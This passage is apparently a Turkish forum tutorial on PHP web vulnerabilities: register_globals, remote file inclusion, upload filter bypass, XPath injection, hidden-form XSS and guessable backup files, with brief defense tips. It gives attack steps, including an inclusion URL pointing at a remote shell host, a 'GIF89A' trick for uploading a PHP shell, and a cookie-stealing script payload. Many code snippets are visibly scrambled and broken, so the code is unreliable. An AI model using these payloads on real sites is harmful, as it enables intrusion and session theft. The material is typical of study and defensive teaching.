#Register Globals fonksiyonunu daima kapalı tutunuz.
#Ve yahut kendi insiyatifinizi kullanarak:
Kod:
$is_admin =();
Kod:
<?php$is_admin =()if (isset($is_admin)) {//Admin Paneline Hoş Geldiniz![...]} else {yaptınız! [...] } ?>//Yanlış giriş
Register Global 0n olduğu zaman inputu şekillendirebildiğimize göre çok fazla sayıda açık türü meydana gelebilir.
Kod:
<?phpinclude "$path/kasva.php";?>
Örnek atak modülü:
Kod:
#http://127.0.0.1:80/index.php?path=http://shelliniz.org/?
[~] File Upload Vulnerability
Shell upload açıkları php sistemlerde dosya tiplerinin tam filtre edilememesinden kaynaklanır.
Sadece grafik uzantılı dosyaları upload eden bir uygulamaya kendi php kodlarımızı upload edebiliriz.
ÖRNEK
Kod:
<?php....ILES[’userfile’][’type’] != "image/gif") { ....if($_ F}?>
Ancak dosya uzantısı kontrol edilmiyor.Dosya türü ile uzantısı çok farklı terimlerdir.
Peki nasıl exploit ederiz?Cevap : php dosyamızı gif türünde yollarız:
Php dosyamızın ilk satırına:
"GIF89A" kodunu hepsi büyük harf olarak girmemiz gerekiyor.Küçük harflerle kabul olmaz.
Ve php dosyasının upload edildiğini göreceksiniz.
DEFANS
Dosya uzantılarını yasaklayarak filtre engeli koyabiliriz.
Kod:
$yasak = array(".php", ".phtml", ".php3", ".php4");
(.htaccess dosyası kullanarak ignore* yada deny all# komutları ile bunu yapabilirsiniz.)
En önemliside upload dosyalarına random isim verilmesini sağlayabiliriz.
Böylece php dosyaları upload edilse bile klasör yasak olduğundan ve ismide random olduğundan dosyayı görünteleyemeyecektir.
__________________________________________________ _____________
[~] XPath Injection (XML FUNCTIONS) Vulnerability
Xpath injection SQL Injectiona bir hayli benzeyen bir başka injection çeşididir.
SQL Injectionda SQL databaseye yapılan injection XPath Injectionda XML dosyasına yöneliktir.
Açığı tespit için ilk olarak XPath sorguları gönderen input alanları belirlemek gerekir.
ÖRNEK
Kod:
<?php$test = $_GET[’test’];if ($test){exml_load_file("kasva.xml"); $result = $$xml = simplxml->xpath($test);print_r($result); }?>
Şimdi bu xml dosyasına bakalım:
Kod:
<?xml version="1.0" encoding="UTF-8"?><note><to>kayra</to>ading>Mektup</head<from>kasva</from><heing><bOdy>Seni seviyorum kayra!</bOdy></note>
Evet php dosyamıza göre sorguları gönderelim:
Kod:
Index.php?test=from:#Array ( [0] => SimpleXMLElement Object ( [0] => kasva ) )ndex.php?test=*IleXMLElement Object ( [0] => kayra ) [1] => SimpleXMLElement Object ( [0] => kasva ) [2] => SimpleXMLEl#Array ( [0] => Simpement Object ( [0] => Reminder ) [3] => SimpleXMLElement Object ( [0] => Seni seviyorum kayra! ) )
__________________________________________________ _____________
[~] Hidden Form Manipulation Vulnerability
Bu tür bir açık hidden form alanlarını kullanıcı data geçişi için kullanan her web sayfasında meydana gelebilir.
Hidden form alanlarını manipule ederek c0de inject edebiliriz.Peki nasıl olur bu iş?
Bir çok web programcısı bu alanları kodlarken hidden formlarda bulunan inputları code injectionu engellemek için
"> < " ’" gibi karakterlerden filtrelerler.
Anak bu filtreme datanın hidden forma geçişinden önce olmalıdır.Yani:
DATA - HIDDEN FORM - FILTRE >Bu kullanım güvenlik zaafiyeti yaratır.
DATA - FILTRE - HIDDEN FORM >Güvenli kullanım.
Peki bu açıklar ne tür sayfalarda bulunur; örneğin multi geçişli admin sayflarında admin ismi hidden formlara geçiş yapar.
user-login-HIDDEN FORM-admin-login-HIDDEN FORM-yönetici
ÖRNEK
Örnek bir kullanıma bakalım:
Kod:
<form><input type="hidden" name="username" value="kasva" ></form>
Kod:
<form><input type="hidden" name="username" value="" >kasva"></form>
Ve şimdi xss codumuzu inject edelim:
"> <scr ipt>alert(docu ment.cookie)</script> <a href =" (sonuna kapatıcı tag koymuyoruz)
Bakalım:
Kod:
<form><input type="hidden" name="username" value=""><scr ipt>alert(********.cookie)</script><a name =""></form>
DEFANS
Hidden formlara filtresiz data geçişi yapmayınız!
__________________________________________________ _____________
[~] Backup Files Download Vulnerability
Fazla görülmesede can sıkıcı bir açıktır.
Acemi Web programcıları backup dosyalarını saklarken random olarak adlandırırlar.
ÖRNEK
Kod:
<?php$rnd = rand(1,100);$fp = fopen($rnd.’_backup_.sql’, ’w’);fwrite($fp, $db );fclose($fp);?>
ve 3. satırdada $rnd_backup_.sql ile bu backup dosyalarına atanıyor.
Bruteforce programı ile backup dosya ismini kolayca ele geçebiliriz
Fazla önemsenmeyen bir açık olmasına rağmen, önemli scriptlerde kendine yer buluyor:
Bakınız=> PHP-Fusion 6.00.105 Accessible Database Backups Download Vulnerable
